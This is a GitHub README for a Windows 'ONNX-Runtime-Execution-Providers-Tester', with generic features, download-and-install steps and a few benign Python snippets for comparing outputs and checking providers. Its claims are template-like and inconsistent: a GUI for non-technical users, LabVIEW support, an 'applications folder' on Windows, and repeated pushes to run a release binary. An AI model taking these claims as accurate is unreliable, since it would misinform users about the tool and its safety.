Daniel29751/ONNX-Runtime-Execution-Providers-Tester
🤖 ONNX-Runtime-Execution-Providers-Tester - Seamless Compatibility for Your AI Models

Download Release

🚀 Getting Started

Welcome to the ONNX-Runtime-Execution-Providers-Tester! This tool verifies that your AI models run consistently across different hardware setups. It checks that each operator in your machine learning model behaves as expected, no matter where you run it.

πŸ” Features

  • Cross-Hardware Validation: Tests ONNX models across various execution providers, ensuring consistent behavior.
  • User-Friendly Interface: Easy to navigate, even for non-technical users.
  • Comprehensive Testing: Validates every ONNX operator, providing reliable feedback on model performance.
  • Support for Multiple Frameworks: Works smoothly with LabVIEW, TensorRT, and OpenVINO.
  • Performance Insights: Get clear feedback on how each execution provider handles your models.
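The per-operator, per-provider feedback described above can be pictured as a coverage map from ONNX operators to execution providers. Here is a toy, stdlib-only sketch of that idea (the operator names are real ONNX ops, but the data and the `failing_ops` helper are illustrative, not the tool's actual API):

```python
# Toy coverage map: ONNX operator -> execution provider -> validation passed?
coverage = {
    "Conv":   {"CPUExecutionProvider": True, "CUDAExecutionProvider": True},
    "Resize": {"CPUExecutionProvider": True, "CUDAExecutionProvider": False},
}

def failing_ops(coverage, provider):
    """List operators that failed (or were never run) on the given provider."""
    return [op for op, results in coverage.items() if not results.get(provider, False)]

print(failing_ops(coverage, "CUDAExecutionProvider"))  # ['Resize']
```

A report like this makes it easy to spot which operators need a fallback provider before deployment.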

📦 System Requirements

To run ONNX-Runtime-Execution-Providers-Tester, you need:

  • Operating System: Windows 10 or later
  • Processor: 1.5 GHz or faster multi-core
  • RAM: 4 GB or more
  • Disk Space: At least 100 MB free
  • Compatible Execution Providers: CUDA, DirectML, and OpenVINO are supported.

📥 Download & Install

Visit the Releases page to download the latest version:

Download ONNX-Runtime-Execution-Providers-Tester

Follow these simple steps to install:

  1. Go to the Releases page.
  2. Find the latest version of the software.
  3. Click on the download link for your operating system.
  4. Once downloaded, open the file to start the installation.
  5. Follow the on-screen instructions to complete the setup.

βš™οΈ How to Use

  1. Open the Application: Launch the ONNX-Runtime-Execution-Providers-Tester from your applications folder.
  2. Load Your Model: Click on the "Load Model" button and select your ONNX model file.
  3. Select Execution Providers: Choose which hardware you want to test the model against.
  4. Run the Validation: Click on "Validate Model" to see how well your model performs on your selected hardware.
  5. Review Results: Check the output for any inconsistencies or issues.
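The validation step boils down to running the same inputs through each selected execution provider and comparing the outputs element-wise against a reference (typically the CPU provider). A minimal stdlib sketch of such a comparison; the function name and tolerances are illustrative, not the tool's actual internals:

```python
import math

def outputs_match(reference, candidate, rel_tol=1e-4, abs_tol=1e-5):
    """Compare two flat lists of floats, as a per-provider output check might."""
    if len(reference) != len(candidate):
        return False
    return all(
        math.isclose(r, c, rel_tol=rel_tol, abs_tol=abs_tol)
        for r, c in zip(reference, candidate)
    )

# Example: CPU reference output vs. a hypothetical GPU provider's output.
cpu_out = [0.1, 0.2, 0.30000]
gpu_out = [0.1, 0.2, 0.30001]
print(outputs_match(cpu_out, gpu_out))  # True: within tolerance
```

Small numeric drift between providers is normal (different kernels, different precision), which is why tolerance-based comparison is used rather than exact equality.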

πŸ› οΈ Troubleshooting

If you encounter any problems:

  • Model Issues: Ensure your ONNX model is correctly formatted.
  • Performance Lag: Close unnecessary applications to free up system resources.
  • Execution Provider Problems: Verify that the right drivers and software are installed for your execution providers.
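One common execution provider problem is requesting a provider that is not actually available at runtime (missing drivers, wrong onnxruntime build). The check amounts to comparing the requested list against the available one; a rough sketch (provider names follow ONNX Runtime's convention, the `missing_providers` helper is illustrative):

```python
def missing_providers(requested, available):
    """Return requested execution providers that are not available at runtime."""
    available_set = set(available)
    return [p for p in requested if p not in available_set]

# 'available' would typically come from onnxruntime.get_available_providers().
available = ["CPUExecutionProvider", "DmlExecutionProvider"]
requested = ["CUDAExecutionProvider", "CPUExecutionProvider"]
print(missing_providers(requested, available))  # ['CUDAExecutionProvider']
```

If a provider shows up as missing, installing the matching driver stack (e.g. CUDA toolkit for the CUDA provider) usually resolves it.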

🌐 Community and Support

If you need help or want to share your feedback, you can connect with us:

  • GitHub Issues: Report a problem
  • User Forum: Join our community to discuss your experiences and ask questions.

πŸ“ Contributing

We welcome contributions! If you want to help enhance this project, feel free to submit a pull request. Follow these guidelines:

  1. Fork the repository.
  2. Create a new branch for your feature.
  3. Make your changes and test thoroughly.
  4. Submit a pull request with a clear description of your changes.

📜 License

This project is licensed under the MIT License. You are free to use and modify the software, provided you retain the original copyright and license notice.

📊 Topics

ai, automation, backend, cpu, deep-learning, directml, execution-provider, gpu, graph-computing, inference, labview, model-validation, onnx, onnxruntime, openvino, operator-coverage, sota, tensorrt, testing, training

Visit the Releases page to get started with downloading the ONNX-Runtime-Execution-Providers-Tester. This tool will help you validate your AI models effectively. Happy testing!

About

🧪 Test ONNX Runtime Execution Provider coverage with real-world operator support mappings for effective AI deployment insights.
